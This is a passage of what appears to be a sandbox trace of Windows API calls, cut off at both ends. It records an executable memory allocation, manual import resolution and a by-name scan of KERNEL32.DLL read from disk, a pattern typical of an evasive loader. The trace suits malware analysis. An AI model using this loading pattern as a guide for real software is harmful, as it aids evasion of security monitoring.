hHeap=0x4e0000) returned 1 [0242.664] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x3892980 | out: hHeap=0x4e0000) returned 1 [0242.665] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x38a5b90 | out: hHeap=0x4e0000) returned 1 [0242.665] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x38b8da0 | out: hHeap=0x4e0000) returned 1 [0242.667] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x38cbfb0 | out: hHeap=0x4e0000) returned 1 [0242.669] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x38df1c0 | out: hHeap=0x4e0000) returned 1 [0242.669] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x38f23d0 | out: hHeap=0x4e0000) returned 1 [0242.671] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x39055e0 | out: hHeap=0x4e0000) returned 1 [0242.673] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x39187f0 | out: hHeap=0x4e0000) returned 1 [0242.677] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x392ba00 | out: hHeap=0x4e0000) returned 1 [0242.945] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x393ec10 | out: hHeap=0x4e0000) returned 1 [0242.948] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x3951e20 | out: hHeap=0x4e0000) returned 1 [0242.949] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x3965030 | out: hHeap=0x4e0000) returned 1 [0242.950] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x3978240 | out: hHeap=0x4e0000) returned 1 [0242.951] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x398b450 | out: hHeap=0x4e0000) returned 1 [0242.951] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x399e660 | out: hHeap=0x4e0000) returned 1 [0242.953] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x39b1870 | out: hHeap=0x4e0000) returned 1 [0242.954] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x39c4a80 | out: hHeap=0x4e0000) returned 1 [0242.956] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x39d7c90 | out: hHeap=0x4e0000) returned 1 [0242.958] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x39eaea0 | out: hHeap=0x4e0000) returned 1 [0242.960] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x39fe0b0 | out: hHeap=0x4e0000) returned 1 [0242.963] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x3a112c0 | out: hHeap=0x4e0000) returned 1 [0242.966] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x3a244d0 | out: hHeap=0x4e0000) returned 1 [0242.971] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x3a376e0 | out: hHeap=0x4e0000) returned 1 [0242.977] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x3a4a8f0 | out: hHeap=0x4e0000) returned 1 [0243.140] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x3a5db00 | out: hHeap=0x4e0000) returned 1 [0243.140] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x3a70d10 | out: hHeap=0x4e0000) returned 1 [0243.141] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x3a83f20 | out: hHeap=0x4e0000) returned 1 [0243.143] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x3a97130 | out: hHeap=0x4e0000) returned 1 [0243.145] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x3aaa340 | out: hHeap=0x4e0000) returned 1 [0243.147] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x3abd550 | out: hHeap=0x4e0000) returned 1 [0243.149] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x3ad0760 | out: hHeap=0x4e0000) returned 1 [0243.153] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x3ae3970 | out: hHeap=0x4e0000) returned 1 [0243.156] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x52a690 | out: hHeap=0x4e0000) returned 1 [0243.157] VirtualAlloc (lpAddress=0x180000000, dwSize=0x19000, flAllocationType=0x3000, flProtect=0x40) returned 0x180000000 [0243.161] VirtualProtect (in: lpAddress=0x1800122e0, dwSize=0xc8, flNewProtect=0x4, lpflOldProtect=0x14f750 | out: lpflOldProtect=0x14f750*=0x40) returned 1 [0243.161] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x7ffc5ecd0000 [0243.162] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ExitProcess") returned 0x7ffc5ecf4d80 [0243.162] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleA") returned 0x7ffc5ecf4c90 [0243.162] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcAddress") returned 0x7ffc5ecf0b80 [0243.162] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcessHeap") returned 0x7ffc5eced4f0 [0243.162] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapAlloc") returned 0x7ffc5f8352d0 [0243.163] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapFree") returned 0x7ffc5eceb480 [0243.163] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapReAlloc") returned 0x7ffc5f8339f0 [0243.163] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcatA") returned 0x7ffc5ecf6bb0 [0243.163] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcatW") returned 0x7ffc5ecfa250 [0243.163] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcmpA") returned 0x7ffc5ecf3690 [0243.163] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpyA") returned 0x7ffc5ecf45d0 [0243.164] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpyW") returned 0x7ffc5ecf6d30 [0243.164] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpynW") returned 0x7ffc5ecf91a0 [0243.164] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenA") returned 0x7ffc5ecf0c60 [0243.164] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenW") returned 0x7ffc5eced6d0 [0243.164] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x7ffc5e960000 [0243.164] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="wsprintfA") returned 0x7ffc5e984d50 [0243.164] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="wsprintfW") returned 0x7ffc5e9881e0 [0243.164] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x7ffc5e7b0000 [0243.164] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrCSpnA") returned 0x7ffc5e7c5b00 [0243.165] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrCSpnW") returned 0x7ffc5e7bd780 [0243.165] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrDupA") returned 0x7ffc5e7c5c30 [0243.165] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrSpnA") returned 0x7ffc5e7c5ca0 [0243.165] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrSpnW") returned 0x7ffc5e7c5cb0 [0243.165] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x50db40 | out: hHeap=0x4e0000) returned 1 [0243.166] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x52d940 | out: hHeap=0x4e0000) returned 1 [0243.170] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f0a40 | out: hHeap=0x4e0000) returned 1 [0243.172] GetModuleHandleA (lpModuleName="NTDLL.dll") returned 0x7ffc5f810000 [0243.172] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnprintf") returned 0x7ffc5f8a6970 [0243.172] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnwprintf") returned 0x7ffc5f8a6a40 [0243.172] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memset") returned 0x7ffc5f8bb580 [0243.172] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memcpy") returned 0x7ffc5f8bb240 [0243.173] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memmove") returned 0x7ffc5f8bb240 [0243.408] GetProcessHeap () returned 0x4e0000 [0243.408] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x68) returned 0x4e8d40 [0243.408] GetProcessHeap () returned 0x4e0000 [0243.408] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x10) returned 0x4f9160 [0243.409] GetProcessHeap () returned 0x4e0000 [0243.409] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x48) returned 0x4f0270 [0243.409] GetModuleHandleA (lpModuleName="Kernel32.dll") returned 0x7ffc5ecd0000 [0243.409] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcAddress") returned 0x7ffc5ecf0b80 [0243.409] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LoadLibraryW") returned 0x7ffc5ecf50f0 [0243.409] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LoadLibraryA") returned 0x7ffc5ecf74d0 [0243.410] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="FreeLibrary") returned 0x7ffc5ecf4810 [0243.410] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleW") returned 0x7ffc5ecf3d40 [0243.410] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleA") returned 0x7ffc5ecf4c90 [0243.410] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x7ffc5ecd0000 [0243.410] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0243.410] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0243.410] GetModuleFileNameA (in: hModule=0x7ffc5ecd0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\KERNEL32.DLL" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0243.411] CreateFileA (lpFileName="C:\\Windows\\system32\\KERNEL32.DLL" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0243.411] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0243.411] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0243.411] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=705584) returned 1 [0243.411] GetProcessHeap () returned 0x4e0000 [0243.411] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0xac430) returned 0x50c5f0 [0243.414] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0243.414] ReadFile (in: hFile=0x134, lpBuffer=0x50c5f0, nNumberOfBytesToRead=0xac430, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x50c5f0*, lpNumberOfBytesRead=0x14f5a4*=0xac430, lpOverlapped=0x0) returned 1 [0243.430] CloseHandle (hObject=0x134) returned 1 [0243.430] lstrcmpA (lpString1="ActivateActCtx", lpString2="AcquireSRWLockExclusive") returned 1 [0243.438] lstrcmpA (lpString1="ActivateActCtx", lpString2="AcquireSRWLockShared") returned 1 [0243.438] lstrcmpA (lpString1="ActivateActCtx", lpString2="ActivateActCtx") returned 0 [0243.438] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="AcquireSRWLockExclusive") returned 1 [0243.438] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="AcquireSRWLockShared") returned 1 [0243.438] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="ActivateActCtx") returned 1 [0243.439] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="ActivateActCtxWorker") returned 0 [0243.439] lstrcmpA (lpString1="AddAtomA", lpString2="AcquireSRWLockExclusive") returned 1 [0243.439] lstrcmpA (lpString1="AddAtomA", lpString2="AcquireSRWLockShared") returned 1 [0243.439] lstrcmpA (lpString1="AddAtomA", lpString2="ActivateActCtx") returned 1 [0243.439] lstrcmpA (lpString1="AddAtomA", lpString2="ActivateActCtxWorker") returned 1 [0243.439] lstrcmpA (lpString1="AddAtomA", lpString2="AddAtomA") returned 0 [0243.439] lstrcmpA (lpString1="AddAtomW", lpString2="AcquireSRWLockExclusive") returned 1 [0243.439] lstrcmpA (lpString1="AddAtomW", lpString2="AcquireSRWLockShared") returned 1 [0243.439] lstrcmpA (lpString1="AddAtomW", lpString2="ActivateActCtx") returned 1 [0243.439] lstrcmpA (lpString1="AddAtomW", lpString2="ActivateActCtxWorker") returned 1 [0243.439] lstrcmpA (lpString1="AddAtomW", lpString2="AddAtomA") returned 1 [0243.439] lstrcmpA (lpString1="AddAtomW", lpString2="AddAtomW") returned 0 [0243.439] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AcquireSRWLockExclusive") returned 1 [0243.439] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AcquireSRWLockShared") returned 1 [0243.439] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="ActivateActCtx") returned 1 [0243.439] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="ActivateActCtxWorker") returned 1 [0243.439] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddAtomA") returned 1 [0243.439] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddAtomW") returned 1 [0243.439] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddConsoleAliasA") returned 0 [0243.439] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AcquireSRWLockExclusive") returned 1 [0243.439] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AcquireSRWLockShared") returned 1 [0243.439] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="ActivateActCtx") returned 1 [0243.439] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="ActivateActCtxWorker") returned 1 [0243.439] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddAtomA") returned 1 [0243.439] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddAtomW") returned 1 [0243.440] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddConsoleAliasA") returned 1 [0243.440] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddConsoleAliasW") returned 0 [0243.440] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AcquireSRWLockExclusive") returned 1 [0243.440] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AcquireSRWLockShared") returned 1 [0243.440] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="ActivateActCtx") returned 1 [0243.440] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="ActivateActCtxWorker") returned 1 [0243.440] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddAtomA") returned 1 [0243.440] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddAtomW") returned 1 [0243.440] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddConsoleAliasA") returned 1 [0243.440] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddConsoleAliasW") returned 1 [0243.440] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddDllDirectory") returned 1 [0243.440] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 0 [0243.440] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AcquireSRWLockExclusive") returned 1 [0243.440] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AcquireSRWLockShared") returned 1 [0243.440] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="ActivateActCtx") returned 1 [0243.440] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="ActivateActCtxWorker") returned 1 [0243.440] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddAtomA") returned 1 [0243.440] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddAtomW") returned 1 [0243.440] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddConsoleAliasA") returned 1 [0243.440] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddConsoleAliasW") returned 1 [0243.440] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddDllDirectory") returned 1 [0243.440] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0243.440] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddLocalAlternateComputerNameA") returned 0 [0243.440] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AcquireSRWLockExclusive") returned 1 [0243.440] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AcquireSRWLockShared") returned 1 [0243.441] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="ActivateActCtx") returned 1 [0243.441] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="ActivateActCtxWorker") returned 1 [0243.441] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddAtomA") returned 1 [0243.441] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddAtomW") returned 1 [0243.441] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddConsoleAliasA") returned 1 [0243.441] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddConsoleAliasW") returned 1 [0243.441] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddDllDirectory") returned 1 [0243.441] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0243.441] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddLocalAlternateComputerNameA") returned 1 [0243.441] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddLocalAlternateComputerNameW") returned 0 [0243.441] lstrcmpA (lpString1="AddRefActCtx", lpString2="AcquireSRWLockExclusive") returned 1 [0243.441] lstrcmpA (lpString1="AddRefActCtx", lpString2="AcquireSRWLockShared") returned 1 [0243.441] lstrcmpA (lpString1="AddRefActCtx", lpString2="ActivateActCtx") returned 1 [0243.441] lstrcmpA (lpString1="AddRefActCtx", lpString2="ActivateActCtxWorker") returned 1 [0243.441] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddAtomA") returned 1 [0243.441] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddAtomW") returned 1 [0243.441] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddConsoleAliasA") returned 1 [0243.441] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddConsoleAliasW") returned 1 [0243.441] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddDllDirectory") returned 1 [0243.441] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0243.441] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddLocalAlternateComputerNameA") returned 1 [0243.441] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddLocalAlternateComputerNameW") returned 1 [0243.441] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddRefActCtx") returned 0 [0243.441] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AcquireSRWLockExclusive") returned 1 [0243.441] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AcquireSRWLockShared") returned 1 [0243.441] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="ActivateActCtx") returned 1 [0243.441] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="ActivateActCtxWorker") returned 1 [0243.442] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddAtomA") returned 1 [0243.442] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddAtomW") returned 1 [0243.442] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddConsoleAliasA") returned 1 [0243.442] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddConsoleAliasW") returned 1 [0243.442] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddDllDirectory") returned 1 [0243.442] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0243.442] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddLocalAlternateComputerNameA") returned 1 [0243.442] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddLocalAlternateComputerNameW") returned 1 [0243.442] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddRefActCtx") returned 1 [0243.442] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddRefActCtxWorker") returned 0 [0243.442] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AcquireSRWLockExclusive") returned 1 [0243.442] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AcquireSRWLockShared") returned 1 [0243.442] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="ActivateActCtx") returned 1 [0243.442] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="ActivateActCtxWorker") returned 1 [0243.442] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddAtomA") returned 1 [0243.442] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddAtomW") returned 1 [0243.442] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddConsoleAliasA") returned 1 [0243.442] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddConsoleAliasW") returned 1 [0243.442] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddDllDirectory") returned 1 [0243.442] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0243.442] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddLocalAlternateComputerNameA") returned 1 [0243.442] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddLocalAlternateComputerNameW") returned 1 [0243.442] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddRefActCtx") returned 1 [0243.442] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddRefActCtxWorker") returned 1 [0243.442] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddResourceAttributeAce") returned 0 [0243.442] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AcquireSRWLockExclusive") returned 1 [0243.442] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AcquireSRWLockShared") returned 1 [0243.442] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="ActivateActCtx") returned 1 [0243.443] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="ActivateActCtxWorker") returned 1 [0243.443] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddAtomA") returned 1 [0243.443] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddAtomW") returned 1 [0243.443] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddConsoleAliasA") returned 1 [0243.443] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddConsoleAliasW") returned 1 [0243.443] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddDllDirectory") returned 1 [0243.443] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0243.443] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddLocalAlternateComputerNameA") returned 1 [0243.443] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddLocalAlternateComputerNameW") returned 1 [0243.443] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddRefActCtx") returned 1 [0243.443] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddRefActCtxWorker") returned 1 [0243.443] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddResourceAttributeAce") returned 1 [0243.443] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddSIDToBoundaryDescriptor") returned 0 [0243.443] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AcquireSRWLockExclusive") returned 1 [0243.443] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AcquireSRWLockShared") returned 1 [0243.443] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="ActivateActCtx") returned 1 [0243.443] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="ActivateActCtxWorker") returned 1 [0243.443] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddAtomA") returned 1 [0243.443] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddAtomW") returned 1 [0243.443] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddConsoleAliasA") returned 1 [0243.443] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddConsoleAliasW") returned 1 [0243.443] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddDllDirectory") returned 1 [0243.443] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0243.443] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddLocalAlternateComputerNameA") returned 1 [0243.443] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddLocalAlternateComputerNameW") returned 1 [0243.443] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddRefActCtx") returned 1 [0243.443] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddRefActCtxWorker") returned 1 [0243.443] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddResourceAttributeAce") returned 1 [0243.444] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddSIDToBoundaryDescriptor") returned -1 [0243.444] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddScopedPolicyIDAce") returned 0 [0243.444] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AcquireSRWLockExclusive") returned 1 [0243.444] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AcquireSRWLockShared") returned 1 [0243.444] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="ActivateActCtx") returned 1 [0243.444] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="ActivateActCtxWorker") returned 1 [0243.444] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddAtomA") returned 1 [0243.444] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddAtomW") returned 1 [0243.444] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddConsoleAliasA") returned 1 [0243.444] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddConsoleAliasW") returned 1 [0243.444] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddDllDirectory") returned 1 [0243.444] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0243.444] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddLocalAlternateComputerNameA") returned 1 [0243.444] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddLocalAlternateComputerNameW") returned 1 [0243.444] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddRefActCtx") returned 1 [0243.444] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddRefActCtxWorker") returned 1 [0243.444] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddResourceAttributeAce") returned 1 [0243.444] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddSIDToBoundaryDescriptor") returned -1 [0243.444] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddScopedPolicyIDAce") returned 1 [0243.444] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddSecureMemoryCacheCallback") returned 0 [0243.444] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AcquireSRWLockExclusive") returned 1 [0243.444] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AcquireSRWLockShared") returned 1 [0243.444] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="ActivateActCtx") returned 1 [0243.444] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="ActivateActCtxWorker") returned 1 [0243.444] lstrcmpA (lpString1="AdjustCalendarDate", 